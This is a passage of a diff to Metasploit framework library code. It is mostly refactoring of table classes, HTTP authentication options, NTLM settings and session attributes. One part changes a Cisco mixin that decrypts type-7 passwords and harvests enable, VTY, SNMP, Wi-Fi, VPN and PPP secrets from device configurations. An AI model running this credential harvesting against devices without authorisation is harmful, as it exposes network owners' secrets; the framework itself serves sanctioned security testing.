      'Header'  => h,
      'Columns' =>
@@ -92,7 +92,7 @@ class ReadableText
  # @param h [String] the string to display as the table heading.
  # @return [String] the string form of the table.
  def self.dump_module_actions(mod, indent = '', h = nil)
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Header'  => h,
      'Columns' =>
@@ -116,7 +116,7 @@ class ReadableText
  # @param h [String] the string to display as the table heading.
  # @return [String] the string form of the table.
  def self.dump_module_action(mod, indent = '', h = nil)
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Header'  => h,
      'Columns' =>
@@ -139,7 +139,7 @@ class ReadableText
  # @param h [String] the string to display as the table heading.
  # @return [String] the string form of the table.
  def self.dump_compatible_payloads(exploit, indent = '', h = nil)
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Header'  => h,
      'Columns' =>
@@ -390,7 +390,7 @@ class ReadableText
  # @param missing [Boolean] dump only empty required options.
  # @return [String] the string form of the information.
  def self.dump_options(mod, indent = '', missing = false)
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Columns' =>
        [
@@ -419,7 +419,7 @@ class ReadableText
  # @param indent [String] the indentation to use.
  # @return [String] the string form of the information.
  def self.dump_advanced_options(mod, indent = '')
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Columns' =>
        [
@@ -444,7 +444,7 @@ class ReadableText
  # @param indent [String] the indentation to use.
  # @return [String] the string form of the information.
  def self.dump_evasion_options(mod, indent = '')
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Columns' =>
        [
@@ -490,7 +490,7 @@ class ReadableText
  # @param col [Integer] the column width.
  # @return [String] the formatted DataStore contents.
  def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent,
      'Header'  => name,
      'Columns' =>
@@ -529,7 +529,7 @@ class ReadableText
    columns << 'Information'
    columns << 'Connection'

-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent,
      'Header'  => "Active sessions",
      'Columns' => columns)
@@ -653,7 +653,7 @@ class ReadableText
      columns += [ "URIPATH", "Start Time", "Handler opts" ]
    end

-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent,
      'Header'  => "Jobs",
      'Columns' => columns
@@ -50,7 +50,6 @@ class CommandShell
  def initialize(*args)
    self.platform ||= ""
    self.arch     ||= ""
-    self.max_threads = 1
    super
  end

@@ -236,7 +235,6 @@ class CommandShell

  attr_accessor :arch
  attr_accessor :platform
-  attr_accessor :max_threads

 protected

@@ -69,9 +69,6 @@ class Meterpreter < Rex::Post::Meterpreter::Client
    # Don't pass the datastore into the init_meterpreter method
    opts.delete(:datastore)

-    # Assume by default that 10 threads is a safe number for this session
-    self.max_threads ||= 10
-
    #
    # Initialize the meterpreter client
    #
@@ -325,40 +322,6 @@ class Meterpreter < Rex::Post::Meterpreter::Client
  def update_session_info
    username = self.sys.config.getuid
    sysinfo  = self.sys.config.sysinfo
-    tuple = self.platform.split('/')
-
-    #
-    # Windows meterpreter currently needs 'win32' or 'win64' to be in the
-    # second half of the platform tuple, in order for various modules and
-    # library code match on that specific string.
-    #
-    if self.platform !~ /win32|win64/
-
-      platform = case self.sys.config.sysinfo['OS']
-        when /windows/i
-          Msf::Module::Platform::Windows
-        when /darwin/i
-          Msf::Module::Platform::OSX
-        when /freebsd/i
-          Msf::Module::Platform::FreeBSD
-        when /netbsd/i
-          Msf::Module::Platform::NetBSD
-        when /openbsd/i
-          Msf::Module::Platform::OpenBSD
-        when /sunos/i
-          Msf::Module::Platform::Solaris
-        when /android/i
-          Msf::Module::Platform::Android
-        else
-          Msf::Module::Platform::Linux
-      end.realname.downcase
-
-      #
-      # This normalizes the platform from 'python/python' to 'python/linux'
-      #
-      self.platform = "#{tuple[0]}/#{platform}"
-    end
-

    safe_info = "#{username} @ #{sysinfo['Computer']}"
    safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
@@ -511,7 +474,6 @@ class Meterpreter < Rex::Post::Meterpreter::Client
  attr_accessor :skip_ssl
  attr_accessor :skip_cleanup
  attr_accessor :target_id
-  attr_accessor :max_threads

 protected

@@ -16,8 +16,6 @@ require 'msf/sanity'
 # The framework-core depends on Rex
 require 'rex'
 require 'rex/ui'
-require 'rex/arch'
-include Rex::Arch

 module Msf
  autoload :Author, 'msf/core/author'
@@ -594,12 +594,7 @@ module Auxiliary::AuthBrute
      msg_regex = /(#{ip})(:#{port})?(\s*-?\s*)(#{proto.to_s})?(\s*-?\s*)(.*)/ni
      if old_msg.match(msg_regex) and !old_msg.match(msg_regex)[6].to_s.strip.empty?
        complete_message = ''
-        unless ip.blank? && port.blank?
-          complete_message << "#{ip}:#{rport}"
-        else
-          complete_message << (old_msg.match(msg_regex)[4] || proto).to_s
-        end
-
+        complete_message << (old_msg.match(msg_regex)[4] || proto).to_s
        complete_message << " - "
        progress = tried_over_total(ip,port)
        complete_message << progress if progress
@@ -9,6 +9,7 @@ module Msf
 module Auxiliary::Cisco
  include Msf::Auxiliary::Report

+
  def cisco_ios_decrypt7(inp)
    xlat = [
      0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
@@ -32,60 +33,25 @@ module Auxiliary::Cisco
    end
    clear
  end
-  
-  def create_credential_and_login(opts={})
-    return nil unless active_db?
-
-    if self.respond_to?(:[]) and self[:task]
-      opts[:task_id] ||= self[:task].record.id
-    end
-
-    core               = opts.fetch(:core, create_credential(opts))
-    access_level       = opts.fetch(:access_level, nil)
-    last_attempted_at  = opts.fetch(:last_attempted_at, nil)
-    status             = opts.fetch(:status, Metasploit::Model::Login::Status::UNTRIED)
-
-    login_object = nil
-    retry_transaction do
-      service_object = create_credential_service(opts)
-      login_object = Metasploit::Credential::Login.where(core_id: core.id, service_id: service_object.id).first_or_initialize
-
-      if opts[:task_id]
-        login_object.tasks << Mdm::Task.find(opts[:task_id])
-      end
-
-      login_object.access_level      = access_level if access_level
-      login_object.last_attempted_at = last_attempted_at if last_attempted_at
-      if status == Metasploit::Model::Login::Status::UNTRIED
-        if login_object.last_attempted_at.nil?
-          login_object.status = status
-        end
-      else
-        login_object.status = status
-      end
-      login_object.save!
-    end
-
-    login_object
-  end
-  

  def cisco_ios_config_eater(thost, tport, config)
-    
-    credential_data = {
-      address: thost,
-      port: tport,
-      protocol: 'tcp',
-      workspace_id: myworkspace.id,
-      origin_type: :service,
-      service_name: '',
-      module_fullname: self.fullname,
-      status: Metasploit::Model::Login::Status::UNTRIED
+
+    #
+    # Create a template hash for cred reporting
+    #
+    cred_info = {
+      :host  => thost,
+      :port  => tport,
+      :user  => "",
+      :pass  => "",
+      :type  => "",
+      :collect_type => "",
+      :active => true
    }

    # Default SNMP to UDP
    if tport == 161
-      credential_data[:protocol] = 'udp'
+      cred_info[:proto] = 'udp'
    end

    store_loot("cisco.ios.config", "text/plain", thost, config.strip, "config.txt", "Cisco IOS Configuration")
@@ -104,42 +70,40 @@ module Auxiliary::Cisco
          if stype == 5
            print_good("#{thost}:#{tport} MD5 Encrypted Enable Password: #{shash}")
            store_loot("cisco.ios.enable_hash", "text/plain", thost, shash, "enable_password_hash.txt", "Cisco IOS Enable Password Hash (MD5)")
-            cred = credential_data.dup
-            cred[:private_data] = shash
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
          end

          if stype == 0
            print_good("#{thost}:#{tport} Enable Password: #{shash}")
            store_loot("cisco.ios.enable_pass", "text/plain", thost, shash, "enable_password.txt", "Cisco IOS Enable Password")

-            cred = credential_data.dup
-            cred[:private_data] = shash
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
-
+            cred = cred_info.dup
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

          if stype == 7
            shash = cisco_ios_decrypt7(shash) rescue shash
            print_good("#{thost}:#{tport} Decrypted Enable Password: #{shash}")
            store_loot("cisco.ios.enable_pass", "text/plain", thost, shash, "enable_password.txt", "Cisco IOS Enable Password")
-            
-            cred = credential_data.dup
-            cred[:private_data] = shash
-            cred[:private_type] = :password
-            create_credential_and_login(cred)
+
+            cred = cred_info.dup
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

        when /^\s*enable password (.*)/i
          spass = $1.strip
          print_good("#{thost}:#{tport} Unencrypted Enable Password: #{spass}")

-          cred = credential_data.dup
-          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
-          create_credential_and_login(cred)
+          cred = cred_info.dup
+          cred[:pass] = spass
+          cred[:type] = "password"
+          cred[:collect_type] = "password"
+          store_cred(cred)

 #
 # SNMP
@@ -149,17 +113,21 @@ module Auxiliary::Cisco
          scomm = $1.strip
          print_good("#{thost}:#{tport} SNMP Community (#{stype}): #{scomm}")

-          cred = credential_data.dup
          if stype.downcase == "ro"
-            cred[:access_level] = "RO"
+            ptype = "password_ro"
          else
-            cred[:access_level] = "RW"
+            ptype = "password"
          end
-          cred[:protocol] = "udp"
-          cred[:port] = 161
-          cred[:private_data] = scomm
-          cred[:private_type] = :password
-          create_credential_and_login(cred)
+
+          cred = cred_info.dup
+          cred[:sname] = "snmp"
+          cred[:pass] = scomm
+          cred[:type] = ptype
+          cred[:collect_type] = ptype
+          cred[:proto] = "udp"
+          cred[:port]  = 161
+          store_cred(cred)
+
 #
 # VTY Passwords
 #
@@ -168,31 +136,26 @@ module Auxiliary::Cisco
          spass = cisco_ios_decrypt7(spass) rescue spass

          print_good("#{thost}:#{tport} Decrypted VTY Password: #{spass}")
-          
-          cred = credential_data.dup
-          cred[:private_data] = spass
-          cred[:private_type] = :password
-          create_credential_and_login(cred)
-          
+          cred = cred_info.dup
+
+          cred[:pass] = spass
+          cred[:type] = "password"
+          cred[:collect_type] = "password"
+          store_cred(cred)

        when /^\s*(password|secret) 5 (.*)/i
-          shash = $2.strip
+          shash = $1.strip
          print_good("#{thost}:#{tport} MD5 Encrypted VTY Password: #{shash}")
          store_loot("cisco.ios.vty_password", "text/plain", thost, shash, "vty_password_hash.txt", "Cisco IOS VTY Password Hash (MD5)")
-          
-          cred = credential_data.dup
-          cred[:private_data] = shash
-          cred[:private_type] = :nonreplayable_hash
-          create_credential_and_login(cred)
-          
+
        when /^\s*password (0 |)([^\s]+)/i
          spass = $2.strip
          print_good("#{thost}:#{tport} Unencrypted VTY Password: #{spass}")
-          
-          cred = credential_data.dup
-          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
-          create_credential_and_login(cred)
+          cred = cred_info.dup
+          cred[:pass] = spass
+          cred[:type] = "password"
+          cred[:collect_type] = "password"
+          store_cred(cred)

 #
 # WiFi Passwords
@@ -210,29 +173,29 @@ module Auxiliary::Cisco
          if stype == 5
            print_good("#{thost}:#{tport} Wireless WPA-PSK MD5 Password Hash: #{spass}")
            store_loot("cisco.ios.wireless_wpapsk_hash", "text/plain", thost, spass, "wireless_wpapsk_hash.txt", "Cisco IOS Wireless WPA-PSK Password Hash (MD5)")
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
          end

          if stype == 0
            print_good("#{thost}:#{tport} Wireless WPA-PSK Password: #{spass}")
+            cred = cred_info.dup
+            cred[:pass] = spass
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
+
            store_loot("cisco.ios.wireless_wpapsk", "text/plain", thost, spass, "wireless_wpapsk.txt", "Cisco IOS Wireless WPA-PSK Password")
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
          end

          if stype == 7
            spass = cisco_ios_decrypt7(spass) rescue spass
            print_good("#{thost}:#{tport} Wireless WPA-PSK Decrypted Password: #{spass}")
+            cred = cred_info.dup
+            cred[:pass] = spass
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
+
            store_loot("cisco.ios.wireless_wpapsk", "text/plain", thost, spass, "wireless_wpapsk.txt", "Cisco IOS Wireless WPA-PSK Decrypted Password")
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :password
-            create_credential_and_login(cred)
          end

 #
@@ -245,11 +208,11 @@ module Auxiliary::Cisco
          print_good("#{thost}:#{tport} VPN IPSEC ISAKMP Key '#{spass}' Host '#{shost}'")
          store_loot("cisco.ios.vpn_ipsec_key", "text/plain", thost, "#{spass}", "vpn_ipsec_key.txt", "Cisco VPN IPSEC Key")

-          cred = credential_data.dup
-          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
-          create_credential_and_login(cred)
-          
+          cred = cred_info.dup
+          cred[:pass] = spass
+          cred[:type] = "password"
+          cred[:collect_type] = "password"
+          store_cred(cred)
        when /^\s*interface tunnel(\d+)/i
          tuniface = $1

@@ -259,24 +222,25 @@ module Auxiliary::Cisco

          print_good("#{thost}:#{tport} GRE Tunnel Key #{spass} for Interface Tunnel #{siface}")
          store_loot("cisco.ios.gre_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "gre_tunnel_key.txt", "Cisco GRE Tunnel Key")
-          
-          cred = credential_data.dup
-          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
-          create_credential_and_login(cred)
-          
+
+          cred = cred_info.dup
+          cred[:pass] = spass
+          cred[:type] = "password"
+          cred[:collect_type] = "password"
+          store_cred(cred)
+
        when /^\s*ip nhrp authentication ([^\s]+)/i
          spass = $1
          siface = tuniface

          print_good("#{thost}:#{tport} NHRP Authentication Key #{spass} for Interface Tunnel #{siface}")
          store_loot("cisco.ios.nhrp_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "nhrp_tunnel_key.txt", "Cisco NHRP Authentication Key")
-          
-          cred = credential_data.dup
-          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
-          create_credential_and_login(cred)
-          
+
+          cred = cred_info.dup
+          cred[:pass] = spass
+          cred[:type] = "password"
+          cred[:collect_type] = "password"
+          store_cred(cred)

 #
 # Various authentication secrets
@@ -285,142 +249,139 @@ module Auxiliary::Cisco
          user  = $1
          priv  = $2
          stype = $4.to_i
-          spass = $5
+          shash = $5

          if stype == 5
-            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{shash}")
+            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}_level#{priv}:#{shash}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
          end

          if stype == 0
-            print_good("#{thost}:#{tport} Username '#{user}' with Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
+            print_good("#{thost}:#{tport} Username '#{user}' with Password: #{shash}")
+            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{shash}", "username_password.txt", "Cisco IOS Username and Password")

-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            cred = cred_info.dup
+            cred[:user] = user
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

          if stype == 7
-            spass = cisco_ios_decrypt7(spass) rescue spass
-            print_good("#{thost}:#{tport} Username '#{user}' with Decrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
+            shash = cisco_ios_decrypt7(shash) rescue shash
+            print_good("#{thost}:#{tport} Username '#{user}' with Decrypted Password: #{shash}")
+            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{shash}", "username_password.txt", "Cisco IOS Username and Password")

-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :password
-            create_credential_and_login(cred)
+            cred = cred_info.dup
+            cred[:user] = user
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

        when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
          user  = $1
          stype = $3.to_i
-          spass = $4
+          shash = $4

          if stype == 5
-            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{shash}")
+            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}:#{shash}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
          end

          if stype == 0
-            print_good("#{thost}:#{tport} Username '#{user}' with Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
+            print_good("#{thost}:#{tport} Username '#{user}' with Password: #{shash}")
+            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{shash}", "username_password.txt", "Cisco IOS Username and Password")

-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            cred = cred_info.dup
+            cred[:user] = user
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

          if stype == 7
-            spass = cisco_ios_decrypt7(spass) rescue spass
-            print_good("#{thost}:#{tport} Username '#{user}' with Decrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
+            shash = cisco_ios_decrypt7(shash) rescue shash
+            print_good("#{thost}:#{tport} Username '#{user}' with Decrypted Password: #{shash}")
+            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{shash}", "username_password.txt", "Cisco IOS Username and Password")

-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :password
-            create_credential_and_login(cred)
+            cred = cred_info.dup
+            cred[:user] = user
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

        when /^\s*ppp.*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i

          suser = $1
          stype = $3.to_i
-          spass = $4
+          shash = $4

          if stype == 5
-            print_good("#{thost}:#{tport} PPP Username #{suser} MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password_hash.txt", "Cisco IOS PPP Username and Password Hash (MD5)")
-            
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            print_good("#{thost}:#{tport} PPP Username #{suser} MD5 Encrypted Password: #{shash}")
+            store_loot("cisco.ios.ppp_username_password_hash", "text/plain", thost, "#{suser}:#{shash}", "ppp_username_password_hash.txt", "Cisco IOS PPP Username and Password Hash (MD5)")
          end

          if stype == 0
-            print_good("#{thost}:#{tport} PPP Username: #{suser} Password: #{spass}")
-            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
-            
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            print_good("#{thost}:#{tport} PPP Username: #{suser} Password: #{shash}")
+            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{shash}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
+
+            cred = cred_info.dup
+            cred[:pass] = shash
+            cred[:user] = suser
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

          if stype == 7
-            spass = cisco_ios_decrypt7(spass) rescue spass
-            print_good("#{thost}:#{tport} PPP Username: #{suser} Decrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
+            shash = cisco_ios_decrypt7(shash) rescue shash
+            print_good("#{thost}:#{tport} PPP Username: #{suser} Decrypted Password: #{shash}")
+            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{shash}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")

-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :password
-            create_credential_and_login(cred)
+            cred = cred_info.dup
+            cred[:pass] = shash
+            cred[:user] = suser
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

        when /^\s*ppp chap (secret|password) (\d+) ([^\s]+)/i
          stype = $2.to_i
-          spass = $3
+          shash = $3

          if stype == 5
-            print_good("#{thost}:#{tport} PPP CHAP MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_password_hash", "text/plain", thost, spass, "ppp_password_hash.txt", "Cisco IOS PPP Password Hash (MD5)")
-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            print_good("#{thost}:#{tport} PPP CHAP MD5 Encrypted Password: #{shash}")
+            store_loot("cisco.ios.ppp_password_hash", "text/plain", thost, shash, "ppp_password_hash.txt", "Cisco IOS PPP Password Hash (MD5)")
          end

          if stype == 0
-            print_good("#{thost}:#{tport} Password: #{spass}")
-            store_loot("cisco.ios.ppp_password", "text/plain", thost, spass, "ppp_password.txt", "Cisco IOS PPP Password")
+            print_good("#{thost}:#{tport} Password: #{shash}")
+            store_loot("cisco.ios.ppp_password", "text/plain", thost, shash, "ppp_password.txt", "Cisco IOS PPP Password")

-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
-            create_credential_and_login(cred)
+            cred = cred_info.dup
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end

          if stype == 7
-            spass = cisco_ios_decrypt7(spass) rescue spass
-            print_good("#{thost}:#{tport} PPP Decrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_password", "text/plain", thost, spass, "ppp_password.txt", "Cisco IOS PPP Password")
+            shash = cisco_ios_decrypt7(shash) rescue shash
+            print_good("#{thost}:#{tport} PPP Decrypted Password: #{shash}")
+            store_loot("cisco.ios.ppp_password", "text/plain", thost, shash, "ppp_password.txt", "Cisco IOS PPP Password")

-            cred = credential_data.dup
-            cred[:private_data] = spass
-            cred[:private_type] = :password
-            create_credential_and_login(cred)
+            cred = cred_info.dup
+            cred[:pass] = shash
+            cred[:type] = "password"
+            cred[:collect_type] = "password"
+            store_cred(cred)
          end
      end
    end
@@ -23,8 +23,8 @@ module Auxiliary::HttpCrawler
        OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]),
        OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]),
        OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]),
-        OptString.new('HttpUsername', [false, 'The HTTP username to specify for authentication']),
-        OptString.new('HttpPassword', [false, 'The HTTP password to specify for authentication']),
+        OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']),
        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION']),
        OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false])

@@ -123,9 +123,9 @@ module Auxiliary::HttpCrawler
      :info     => ""
    })

-    if datastore['HttpUsername'] and datastore['HttpUsername'] != ''
-      t[:username] = datastore['HttpUsername'].to_s
-      t[:password] = datastore['HttpPassword'].to_s
+    if datastore['USERNAME'] and datastore['USERNAME'] != ''
+      t[:username] = datastore['USERNAME'].to_s
+      t[:password] = datastore['PASSWORD'].to_s
      t[:domain]   = datastore['DOMAIN'].to_s
    end

@@ -31,19 +31,6 @@ def initialize(info = {})

 end

-# If a module is using the scanner mixin, technically the RHOST datastore option should be
-# disabled. Only the mixin should be setting this. See #6989
-
-def setup
-  @original_rhost = datastore['RHOST']
-  datastore['RHOST'] = nil
-end
-
-def cleanup
-  datastore['RHOST'] = @original_rhost
-  super
-end
-

 def check
  nmod = replicant
@@ -88,7 +88,6 @@ module OperatingSystems
    SEVEN = "7"
    EIGHT = "8"
    EIGHTONE = "8.1"
-    TEN = "10.0"
  end

  UNKNOWN = "Unknown"
@@ -109,7 +108,6 @@ module OperatingSystems
    WINDOWS_2012    = /^(?:Microsoft )?Windows 2012/
    WINDOWS_8       = /^(?:Microsoft )?Windows 8/
    WINDOWS_81      = /^(?:Microsoft )?Windows 8\.1/
-    WINDOWS_10      = /^(?:Microsoft )?Windows 10/

    LINUX      = /^Linux/i
    MAC_OSX    = /^(?:Apple )?Mac OS X/
@@ -140,4 +138,4 @@ LICENSES         =
    BSD_LICENSE,
    ARTISTIC_LICENSE,
    UNKNOWN_LICENSE
-  ]
+  ]
@@ -517,7 +517,7 @@ module Msf
      # As an user, you shouldn't be using any of these paths anyway.
      columns.delete('Path') if !datastore['VERBOSE']

-      table = Rex::Text::Table.new(
+      table = Rex::Ui::Text::Table.new(
        'Header'  => 'Exploits',
        'Indent'  => 1,
        'Columns' => columns
@@ -625,7 +625,7 @@ module Msf
    # @return [void]
    def show_exploit_list(ip, tag, current_exploit_list)
      order = 1
-      table = Rex::Text::Table.new(
+      table = Rex::Ui::Text::Table.new(
        'Header'  => '',
        'Indent'  => 1,
        'Columns' => ['Order', 'IP', 'Exploit']
@@ -96,7 +96,7 @@ module Exploit::Remote::Ftp
  # This method handles disconnecting our data channel
  #
  def data_disconnect
-    self.datasocket.shutdown if self.datasocket
+    self.datasocket.shutdown
    self.datasocket = nil
  end

@@ -2,6 +2,10 @@

 require 'uri'
 require 'digest'
+require 'rex/proto/ntlm/crypt'
+require 'rex/proto/ntlm/constants'
+require 'rex/proto/ntlm/utils'
+require 'rex/proto/ntlm/exceptions'
 module Msf

 ###
@@ -12,6 +16,15 @@ module Msf
 ###
 module Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
+  include Exploit::Remote::NTLM::Client
+
+  #
+  # Constants
+  #
+  NTLM_CRYPT = Rex::Proto::NTLM::Crypt
+  NTLM_CONST = Rex::Proto::NTLM::Constants
+  NTLM_UTILS = Rex::Proto::NTLM::Utils
+  NTLM_XCEPT = Rex::Proto::NTLM::Exceptions

  #
  # Initializes an exploit module that exploits a vulnerability in an HTTP
@@ -35,14 +48,13 @@ module Exploit::Remote::HttpClient
        OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests',
          Rex::Proto::Http::Client::DefaultUserAgent
          ]),
-        OptString.new('HttpUsername', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('HttpPassword', [false, 'The HTTP password to specify for authentication', '']),
+        OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
        OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
        Opt::SSLVersion,
        OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
-        OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']),
-        OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false])
+        OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout'])
      ], self.class
    )

@@ -137,8 +149,8 @@ module Exploit::Remote::HttpClient
      dossl = ssl
    end

-    client_username = opts['username'] || datastore['HttpUsername'] || ''
-    client_password = opts['password'] || datastore['HttpPassword'] || ''
+    client_username = opts['username'] || datastore['USERNAME'] || ''
+    client_password = opts['password'] || datastore['PASSWORD'] || ''

    nclient = Rex::Proto::Http::Client.new(
      opts['rhost'] || rhost,
@@ -181,6 +193,12 @@ module Exploit::Remote::HttpClient
      'uri_fake_end'           => datastore['HTTP::uri_fake_end'],
      'uri_fake_params_start'  => datastore['HTTP::uri_fake_params_start'],
      'header_folding'         => datastore['HTTP::header_folding'],
+      'usentlm2_session'       => datastore['NTLM::UseNTLM2_session'],
+      'use_ntlmv2'             => datastore['NTLM::UseNTLMv2'],
+      'send_lm'                => datastore['NTLM::SendLM'],
+      'send_ntlm'              => datastore['NTLM::SendNTLM'],
+      'SendSPN'                => datastore['NTLM::SendSPN'],
+      'UseLMKey'               => datastore['NTLM::UseLMKey'],
      'domain'                 => datastore['DOMAIN'],
      'DigestAuthIIS'          => datastore['DigestAuthIIS']
    )
@@ -191,9 +209,9 @@ module Exploit::Remote::HttpClient
